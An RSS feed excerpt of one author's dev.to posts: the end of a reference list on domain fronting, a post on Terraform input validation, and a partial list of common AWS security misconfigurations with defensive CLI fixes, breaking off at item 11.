&lt;/li&gt;
&lt;li&gt;AWS re:Post, &lt;a href="https://repost.aws/questions/QUGi6L4x4nRsCYc_FJ9aQkiQ/prevent-aws-network-firewall-host-header-spoofing" rel="noopener noreferrer"&gt;"Prevent AWS Network Firewall host header spoofing"&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;MITRE ATT&amp;amp;CK, &lt;a href="https://attack.mitre.org/techniques/T1090/004/" rel="noopener noreferrer"&gt;"Domain Fronting T1090.004"&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Palo Alto Networks, &lt;a href="https://docs.paloaltonetworks.com/pan-os/10-2/pan-os-new-features/content-inspection-features/domain-fronting-detection" rel="noopener noreferrer"&gt;"Domain Fronting Detection - PAN-OS 10.2"&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Palo Alto Networks, &lt;a href="https://knowledgebase.paloaltonetworks.com/KCSArticleDetail?id=kA10g000000ClVSCA0" rel="noopener noreferrer"&gt;"How Palo Alto Networks identifies HTTPS applications without decryption"&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Palo Alto Networks, &lt;a href="https://docs.paloaltonetworks.com/vm-series/10-2/vm-series-deployment/set-up-the-vm-series-firewall-on-aws/vm-series-integration-with-gateway-load-balancer" rel="noopener noreferrer"&gt;"VM-Series Integration with AWS Gateway Load Balancer"&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;AWS Marketplace, &lt;a href="https://aws.amazon.com/marketplace/pp/prodview-3xtziatyes54i" rel="noopener noreferrer"&gt;"VM-Series Next-Gen Virtual Firewall PAYG"&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Palo Alto Networks LIVEcommunity, &lt;a href="https://live.paloaltonetworks.com/t5/advanced-threat-prevention/how-to-detect-domain-fronting/td-p/253882" rel="noopener noreferrer"&gt;"How to detect domain fronting"&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;&lt;em&gt;Designing a Security VPC for AWS with centralized traffic inspection? I've done this for enterprise clients across multiple industries. &lt;a href="https://haitmg.pl/#contact" rel="noopener noreferrer"&gt;Let's talk&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>aws</category>
      <category>security</category>
      <category>devops</category>
      <category>cloud</category>
    </item>
    <item>
      <title>Why Every Terraform Module Needs Proper Validation</title>
      <dc:creator>Mariusz Gębala</dc:creator>
      <pubDate>Thu, 05 Mar 2026 11:01:13 +0000</pubDate>
      <link>https://dev.to/haitmg/why-every-terraform-module-needs-proper-validation-24bp</link>
      <guid>https://dev.to/haitmg/why-every-terraform-module-needs-proper-validation-24bp</guid>
      <description>&lt;p&gt;If you've ever deployed a Terraform module only to discover that someone passed a private subnet ID where a public one was expected, you know the pain. The deployment "succeeds", but nothing works. You spend 30 minutes debugging, only to realize the input was wrong from the start.&lt;/p&gt;

&lt;p&gt;Terraform has tools to prevent this. Most people don't use them.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Problem: Silent Misconfiguration
&lt;/h2&gt;

&lt;p&gt;Consider a simple NAT Gateway module:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="nx"&gt;variable&lt;/span&gt; &lt;span class="s2"&gt;"subnet_id"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;description&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"Subnet to place the NAT Gateway in"&lt;/span&gt;
  &lt;span class="nx"&gt;type&lt;/span&gt;        &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;string&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="nx"&gt;resource&lt;/span&gt; &lt;span class="s2"&gt;"aws_nat_gateway"&lt;/span&gt; &lt;span class="s2"&gt;"this"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;allocation_id&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;aws_eip&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;this&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;id&lt;/span&gt;
  &lt;span class="nx"&gt;subnet_id&lt;/span&gt;     &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;subnet_id&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This accepts &lt;em&gt;any&lt;/em&gt; subnet ID. Public, private, doesn't matter. Terraform won't complain. AWS won't complain (immediately). But your private subnets won't have internet access, and you'll spend time figuring out why.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Fix: Validation Blocks
&lt;/h2&gt;

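&lt;p&gt;Since Terraform 0.13, you can add &lt;code&gt;validation&lt;/code&gt; blocks to variables (the &lt;code&gt;startswith&lt;/code&gt; function used in this example needs Terraform 1.3 or later):&lt;br&gt;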
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="nx"&gt;variable&lt;/span&gt; &lt;span class="s2"&gt;"public_subnet_ids"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;description&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"Public subnet IDs for NAT Gateway placement"&lt;/span&gt;
  &lt;span class="nx"&gt;type&lt;/span&gt;        &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;list&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;string&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

  &lt;span class="nx"&gt;validation&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nx"&gt;condition&lt;/span&gt;     &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;length&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;public_subnet_ids&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="err"&gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;
    &lt;span class="nx"&gt;error_message&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"At least one public subnet ID is required."&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;

  &lt;span class="nx"&gt;validation&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nx"&gt;condition&lt;/span&gt;     &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;alltrue&lt;/span&gt;&lt;span class="p"&gt;([&lt;/span&gt;&lt;span class="nx"&gt;for&lt;/span&gt; &lt;span class="nx"&gt;id&lt;/span&gt; &lt;span class="nx"&gt;in&lt;/span&gt; &lt;span class="nx"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;public_subnet_ids&lt;/span&gt; &lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;startswith&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;"subnet-"&lt;/span&gt;&lt;span class="p"&gt;)])&lt;/span&gt;
    &lt;span class="nx"&gt;error_message&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"All values must be valid subnet IDs (starting with 'subnet-')."&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now &lt;code&gt;terraform plan&lt;/code&gt; fails immediately with a clear message if someone passes an empty list or garbage values.&lt;/p&gt;

&lt;h2&gt;
  
  
  Going Further: Preconditions
&lt;/h2&gt;

&lt;p&gt;For validations that need to check &lt;em&gt;relationships&lt;/em&gt; between variables, use &lt;code&gt;precondition&lt;/code&gt; blocks in &lt;code&gt;lifecycle&lt;/code&gt; (available since Terraform 1.2):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="nx"&gt;resource&lt;/span&gt; &lt;span class="s2"&gt;"aws_nat_gateway"&lt;/span&gt; &lt;span class="s2"&gt;"this"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;count&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;single_nat_gateway&lt;/span&gt; &lt;span class="err"&gt;?&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;length&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;public_subnet_ids&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

  &lt;span class="nx"&gt;allocation_id&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;aws_eip&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;this&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;count&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;index&lt;/span&gt;&lt;span class="p"&gt;].&lt;/span&gt;&lt;span class="nx"&gt;id&lt;/span&gt;
  &lt;span class="nx"&gt;subnet_id&lt;/span&gt;     &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;public_subnet_ids&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;count&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;index&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;

  &lt;span class="nx"&gt;lifecycle&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nx"&gt;precondition&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
      &lt;span class="nx"&gt;condition&lt;/span&gt;     &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;single_nat_gateway&lt;/span&gt; &lt;span class="err"&gt;||&lt;/span&gt; &lt;span class="nx"&gt;length&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;public_subnet_ids&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;length&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;private_route_table_ids&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
      &lt;span class="nx"&gt;error_message&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"When using multi-AZ NAT, you need at least as many public subnets as private route tables."&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This catches architectural mistakes at plan time, not after a 10-minute apply.&lt;/p&gt;

&lt;h2&gt;
  
  
  What I Validate in Every Module
&lt;/h2&gt;

&lt;p&gt;After building &lt;a href="https://registry.terraform.io/namespaces/gebalamariusz" rel="noopener noreferrer"&gt;12 Terraform modules&lt;/a&gt; for AWS, here's my checklist:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;What&lt;/th&gt;
&lt;th&gt;Why&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Non-empty required lists&lt;/td&gt;
&lt;td&gt;Prevents silent no-ops&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ID format (&lt;code&gt;subnet-&lt;/code&gt;, &lt;code&gt;vpc-&lt;/code&gt;, &lt;code&gt;sg-&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;Catches copy-paste errors&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CIDR block format&lt;/td&gt;
&lt;td&gt;Regex validation on network inputs&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Mutually exclusive flags&lt;/td&gt;
&lt;td&gt;e.g., &lt;code&gt;single_nat_gateway&lt;/code&gt; vs per-AZ mode&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cross-variable consistency&lt;/td&gt;
&lt;td&gt;Preconditions on resource blocks&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  The Payoff
&lt;/h2&gt;

&lt;p&gt;Every validation you add is one fewer support ticket, one fewer "why isn't this working" Slack message, and one fewer hour lost to debugging obvious misconfigurations.&lt;/p&gt;

&lt;p&gt;The best part: these validations run during &lt;code&gt;terraform plan&lt;/code&gt;. Zero cost. Zero risk. Just faster feedback.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Building Terraform modules for AWS? Check out the &lt;a href="https://registry.terraform.io/namespaces/gebalamariusz" rel="noopener noreferrer"&gt;HAIT module collection&lt;/a&gt; on the Terraform Registry.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>terraform</category>
      <category>aws</category>
      <category>devops</category>
      <category>infrastructure</category>
    </item>
    <item>
      <title>17 AWS security issues I spot in almost every infrastructure audit</title>
      <dc:creator>Mariusz Gębala</dc:creator>
      <pubDate>Tue, 03 Mar 2026 18:54:28 +0000</pubDate>
      <link>https://dev.to/haitmg/17-aws-security-issues-i-spot-in-almost-every-infrastructure-audit-13k7</link>
      <guid>https://dev.to/haitmg/17-aws-security-issues-i-spot-in-almost-every-infrastructure-audit-13k7</guid>
      <description>&lt;p&gt;I've been doing cloud infrastructure audits for a while now - different companies, different industries, tiny teams and huge ones. And almost every time I open an AWS account, I run into the same set of problems.&lt;/p&gt;

&lt;p&gt;They're not exotic zero-days or clever multi-step attack chains. They're basic misconfigurations that stick around because no one ever circles back to clean them up.&lt;/p&gt;

&lt;p&gt;Here are the 17 checks I run every time. Most are 10-minute fixes. A lot of them have been sitting there for months.&lt;/p&gt;

&lt;h2&gt;
  
  
  IAM, the stuff everyone avoids
&lt;/h2&gt;

&lt;p&gt;IAM is boring. Reviewing policies is tedious. So it gets messy fast.&lt;/p&gt;

&lt;h3&gt;
  
  
  1. Root account without MFA
&lt;/h3&gt;

&lt;p&gt;This one always makes me uneasy. The root user can do &lt;em&gt;everything&lt;/em&gt;: billing changes, closing the account, changing the support plan - things even an IAM user with &lt;code&gt;AdministratorAccess&lt;/code&gt; can't do.&lt;/p&gt;

&lt;p&gt;And yet… I still find root accounts protected by just a password. No MFA. Sometimes the password is literally in a shared spreadsheet.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Fix: 5 minutes.&lt;/strong&gt; Go to IAM → &lt;strong&gt;Security credentials&lt;/strong&gt; and add MFA. Use a hardware key if you can, or a virtual MFA app if you can't. Skipping this is not an option.&lt;/p&gt;
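
&lt;p&gt;To confirm the fix took effect, the account summary reports whether root MFA is on. A minimal sketch, assuming your current credentials are allowed to call &lt;code&gt;iam:GetAccountSummary&lt;/code&gt;:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;# Prints 1 when the root user has MFA enabled, 0 when it does not
aws iam get-account-summary --query 'SummaryMap.AccountMFAEnabled' --output text
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;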

&lt;h3&gt;
  
  
  2. IAM users without MFA
&lt;/h3&gt;

&lt;p&gt;Same problem, but for regular humans. Someone creates a developer IAM user, enables console access, and MFA never gets set up. Six months later, that user has admin privileges and logs in from a random Wi-Fi network.&lt;/p&gt;

&lt;p&gt;I check every user with a console login profile. If they don't have at least one MFA device attached, that's a finding.&lt;/p&gt;
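
&lt;p&gt;One way to run that check from the CLI is the IAM credential report. This is a sketch, not the only approach: the helper name &lt;code&gt;users_without_mfa&lt;/code&gt; is made up for illustration, and it assumes the report's standard column layout, where column 4 is &lt;code&gt;password_enabled&lt;/code&gt; and column 8 is &lt;code&gt;mfa_active&lt;/code&gt;.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;# Reads a credential report (CSV) on stdin and prints console users with no MFA.
# Assumes the standard layout: column 1 = user, 4 = password_enabled, 8 = mfa_active.
users_without_mfa() {
  awk -F, 'NR != 1 { if ($4 == "true") if ($8 == "false") print $1 }'
}

# Usage (needs live AWS credentials; give the report a few seconds to generate):
#   aws iam generate-credential-report
#   aws iam get-credential-report --query Content --output text | base64 -d | users_without_mfa
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;The root row reports &lt;code&gt;not_supported&lt;/code&gt; for &lt;code&gt;password_enabled&lt;/code&gt;, so it is skipped here and covered by the root check instead.&lt;/p&gt;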

&lt;h3&gt;
  
  
  3. Access keys older than 90 days
&lt;/h3&gt;

&lt;p&gt;Access keys don't expire. If you don't rotate them, the same key pair works forever - until someone deactivates it.&lt;/p&gt;

&lt;p&gt;I regularly see keys that are 400, 600, even 900+ days old. They end up in CI/CD, hardcoded in scripts, or living in &lt;code&gt;.env&lt;/code&gt; files that got committed years ago.&lt;/p&gt;

&lt;p&gt;CIS recommends rotating every 90 days. Honestly, in 2026, if you're still relying on long-lived keys, strongly consider moving to IAM Identity Center or OIDC federation. If you must keep keys, rotate them.&lt;/p&gt;
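
&lt;p&gt;To see how old a user's keys actually are, list them with their creation dates and do the date math. A rough sketch: the helper name &lt;code&gt;key_age_days&lt;/code&gt; is hypothetical, it assumes GNU &lt;code&gt;date&lt;/code&gt;, and &lt;code&gt;some-user&lt;/code&gt; is a placeholder.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;# Whole days between two dates: key_age_days CREATED TODAY (requires GNU date)
key_age_days() {
  echo $(( ( $(date -u -d "$2" +%s) - $(date -u -d "$1" +%s) ) / 86400 ))
}

# Example: key_age_days 2025-01-01 2025-04-11 prints 100, past the 90-day mark

# Usage (needs live AWS credentials): list a user's keys with creation dates
#   aws iam list-access-keys --user-name some-user \
#     --query 'AccessKeyMetadata[].[AccessKeyId,Status,CreateDate]' --output text
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;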

&lt;h3&gt;
  
  
  4. Access keys that nobody uses
&lt;/h3&gt;

&lt;p&gt;This one's sneaky: an access key that's still "Active" but hasn't been used in 30+ days - or worse, was created and never used at all.&lt;/p&gt;

&lt;p&gt;Unused keys are pure risk with zero benefit. Like leaving a door unlocked to a room nobody ever enters. Delete them.&lt;/p&gt;

&lt;p&gt;AWS shows &lt;code&gt;LastUsedDate&lt;/code&gt;. If it says "None" or it's from last year: deactivate it, wait a week to ensure nothing breaks, then delete it.&lt;/p&gt;
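
&lt;p&gt;The deactivate-wait-delete sequence maps onto three IAM calls. A sketch with placeholder values (&lt;code&gt;AKIAEXAMPLEKEYID&lt;/code&gt; and &lt;code&gt;some-user&lt;/code&gt; are not real):&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;# 1. When was the key last used, and against which service?
aws iam get-access-key-last-used --access-key-id AKIAEXAMPLEKEYID

# 2. Deactivate it first - this step is reversible
aws iam update-access-key --user-name some-user \
  --access-key-id AKIAEXAMPLEKEYID --status Inactive

# 3. A week later, if nothing broke, delete it for good
aws iam delete-access-key --user-name some-user --access-key-id AKIAEXAMPLEKEYID
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;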

&lt;h2&gt;
  
  
  S3, because it's always S3
&lt;/h2&gt;

&lt;p&gt;If you've been around cloud long enough, you've seen the headlines. Capital One, Twitch, even US military-related incidents - S3 comes up again and again. You'd think people would learn. They don't.&lt;/p&gt;

&lt;h3&gt;
  
  
  5. Buckets without Public Access Block
&lt;/h3&gt;

&lt;p&gt;S3 has "Block Public Access" and it's one of the best safety rails AWS has shipped. There are four toggles, and in most cases all four should be ON:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;BlockPublicAcls&lt;/li&gt;
&lt;li&gt;IgnorePublicAcls&lt;/li&gt;
&lt;li&gt;BlockPublicPolicy&lt;/li&gt;
&lt;li&gt;RestrictPublicBuckets&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;With all four enabled, it doesn't matter if someone accidentally adds a public ACL or a wildcard bucket policy - S3 will refuse to go public.&lt;/p&gt;

&lt;p&gt;I still find buckets where one or more are off, or all four are disabled because "the app needs public access." No - it needs CloudFront with OAC, not a public bucket.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;aws s3api put-public-access-block &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--bucket&lt;/span&gt; my-bucket &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--public-access-block-configuration&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nv"&gt;BlockPublicAcls&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;true&lt;/span&gt;,IgnorePublicAcls&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;true&lt;/span&gt;,BlockPublicPolicy&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;true&lt;/span&gt;,RestrictPublicBuckets&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;true&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;One command wipes out a whole class of problems.&lt;/p&gt;

&lt;h3&gt;
  
  
  6. No default encryption
&lt;/h3&gt;

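&lt;p&gt;Since January 2023, S3 encrypts all new object uploads with SSE-S3 by default, and that applies to existing buckets too. But objects written before that change may still be stored unencrypted, and older buckets are worth checking to confirm what's actually configured.&lt;/p&gt;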

&lt;p&gt;Your real threat model probably isn't someone stealing disks from an AWS datacenter - but compliance frameworks care. CIS cares. Auditors care. And it's basically free to enable.&lt;/p&gt;
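
&lt;p&gt;Checking what a bucket is configured with, and setting SSE-S3 explicitly, takes two calls. A sketch, with &lt;code&gt;my-bucket&lt;/code&gt; as a placeholder:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;# Show the bucket's current default encryption rule
aws s3api get-bucket-encryption --bucket my-bucket

# Set SSE-S3 (AES256) as the default for new objects
aws s3api put-bucket-encryption --bucket my-bucket \
  --server-side-encryption-configuration \
  '{"Rules":[{"ApplyServerSideEncryptionByDefault":{"SSEAlgorithm":"AES256"}}]}'
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;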

&lt;h3&gt;
  
  
  7. Versioning disabled
&lt;/h3&gt;

&lt;p&gt;Not strictly security, but it's reliability - and I've watched teams lose important data because someone ran &lt;code&gt;aws s3 rm --recursive&lt;/code&gt; on the wrong prefix.&lt;/p&gt;

&lt;p&gt;Versioning keeps older copies of overwritten/deleted objects. It's cheap insurance. Turn it on for anything that matters.&lt;/p&gt;
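
&lt;p&gt;Turning it on is a single call per bucket. A sketch, again with &lt;code&gt;my-bucket&lt;/code&gt; as a placeholder:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;# Turn versioning on
aws s3api put-bucket-versioning --bucket my-bucket \
  --versioning-configuration Status=Enabled

# Confirm: prints Enabled once versioning is active
aws s3api get-bucket-versioning --bucket my-bucket --query Status --output text
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;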

&lt;h2&gt;
  
  
  EC2, where clutter quietly piles up
&lt;/h2&gt;

&lt;p&gt;EC2 is great at accumulating debt: old instances, forgotten AMIs, resources with no tags, things no one "owns" anymore. Every account has them.&lt;/p&gt;

&lt;h3&gt;
  
  
  8. Publicly shared AMIs
&lt;/h3&gt;

&lt;p&gt;Custom AMIs can contain credentials, internal config, baked-in secrets, proprietary software… and if someone makes one public (even by accident), anyone can launch it and inspect the filesystem.&lt;/p&gt;

&lt;p&gt;I check for any owned AMI where &lt;code&gt;Public: true&lt;/code&gt;. It's almost never intentional - usually someone was testing cross-account sharing and forgot to undo the setting.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;aws ec2 describe-images &lt;span class="nt"&gt;--owners&lt;/span&gt; self &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="s2"&gt;"Images[?Public==&lt;/span&gt;&lt;span class="se"&gt;\`&lt;/span&gt;&lt;span class="s2"&gt;true&lt;/span&gt;&lt;span class="se"&gt;\`&lt;/span&gt;&lt;span class="s2"&gt;].[ImageId,Name]"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  9. Unencrypted EBS volumes
&lt;/h3&gt;

&lt;p&gt;Same story as S3 encryption: compliance + defense in depth. Unencrypted EBS means the data is stored unencrypted on the underlying hardware.&lt;/p&gt;

&lt;p&gt;The annoying part: you can't encrypt an existing volume in place. You snapshot, copy the snapshot with encryption, then create a new encrypted volume. It's doable, just not "one click."&lt;/p&gt;
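
&lt;p&gt;The snapshot-copy-recreate path looks roughly like this. It's a sketch under assumptions: the volume and snapshot IDs are placeholders, the region and AZ are examples, and you still have to wait for each snapshot to complete and then swap the volumes on the instance yourself.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;# 1. Snapshot the unencrypted volume
aws ec2 create-snapshot --volume-id vol-0123456789abcdef0 \
  --description "pre-encryption snapshot"

# 2. Copy the snapshot with encryption turned on
#    (uses the default EBS KMS key unless you also pass --kms-key-id)
aws ec2 copy-snapshot --region eu-central-1 --source-region eu-central-1 \
  --source-snapshot-id snap-0123456789abcdef0 --encrypted

# 3. Create a new volume from the encrypted copy, in the instance's AZ
aws ec2 create-volume --snapshot-id snap-0fedcba9876543210 \
  --availability-zone eu-central-1a
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;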

&lt;p&gt;The better move is enabling EBS encryption by default in each region. Everything new is encrypted automatically, and you migrate old volumes over time.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;aws ec2 enable-ebs-encryption-by-default &lt;span class="nt"&gt;--region&lt;/span&gt; eu-central-1
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  10. Stopped instances nobody remembers
&lt;/h3&gt;

&lt;p&gt;This is more cost than security, but it's a very loud signal about the account's hygiene.&lt;/p&gt;

&lt;p&gt;Stopped instances still rack up charges for attached EBS volumes. They stick around because nobody knows if it's safe to terminate them: "Maybe someone needs it." "It might have data." So it sits there forever.&lt;/p&gt;

&lt;p&gt;If an instance has been stopped for 30+ days: create an AMI, document what it's for, then terminate it. You'll cut waste and reduce the "mystery infrastructure" pile.&lt;/p&gt;
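
&lt;p&gt;A sketch of how that can look from the CLI. The instance ID and AMI name are placeholders; the &lt;code&gt;StateTransitionReason&lt;/code&gt; string usually includes the time the instance was stopped, which is how you spot the 30+ day ones.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;# Stopped instances, with the reason string for the last state change
aws ec2 describe-instances \
  --filters Name=instance-state-name,Values=stopped \
  --query 'Reservations[].Instances[].[InstanceId,StateTransitionReason]' \
  --output text

# Back one up as an AMI before terminating it
aws ec2 create-image --instance-id i-0123456789abcdef0 \
  --name "archive-i-0123456789abcdef0"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;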

&lt;h2&gt;
  
  
  VPC, where real breaches start
&lt;/h2&gt;

&lt;p&gt;Network misconfigurations are how the bad stuff happens. Open security groups are basically open doors.&lt;/p&gt;

&lt;h3&gt;
  
  
  11. Workloads running in the default VPC
&lt;/h3&gt;

